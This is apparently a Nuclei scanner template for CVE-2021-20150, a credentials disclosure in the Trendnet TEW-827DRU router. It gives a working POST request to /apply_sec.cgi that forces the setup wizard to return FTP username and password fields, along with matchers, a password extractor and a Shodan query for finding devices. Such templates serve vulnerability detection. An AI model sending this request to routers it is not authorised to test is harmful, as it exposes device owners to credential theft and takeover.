id: CVE-2021-20150 info: name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure author: gy741 severity: medium description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page. impact: | An attacker can obtain sensitive credentials, leading to unauthorized access to the router. remediation: | Update the router firmware to the latest version to fix the vulnerability. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-20150 cwe-id: CWE-306 epss-score: 0.19434 epss-percentile: 0.95837 cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:* metadata: max-request: 1 vendor: trendnet product: tew-827dru_firmware shodan-query: http.html:"TEW-827DRU" tags: cve2021,cve,disclosure,router,tenable,trendnet http: - raw: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp matchers-condition: and matchers: - type: word part: body words: - 'ftp_username' - 'ftp_password' - 'ftp_permission' - 'TEW-827DRU' condition: and - type: word part: header words: - "text/html" - type: status status: - 200 extractors: - type: regex name: password group: 1 regex: - '' part: body # digest: 4a0a00473045022020641e1868128b30593d1ddc725f1ed066daed96b21177490ee6e7659745b839022100ba439cd4360b3cedb6b422f6d08a9c25bae2c5d95591e97afcc0b9acd99d0bd6:922c64590222798bb761d5b6d8e72950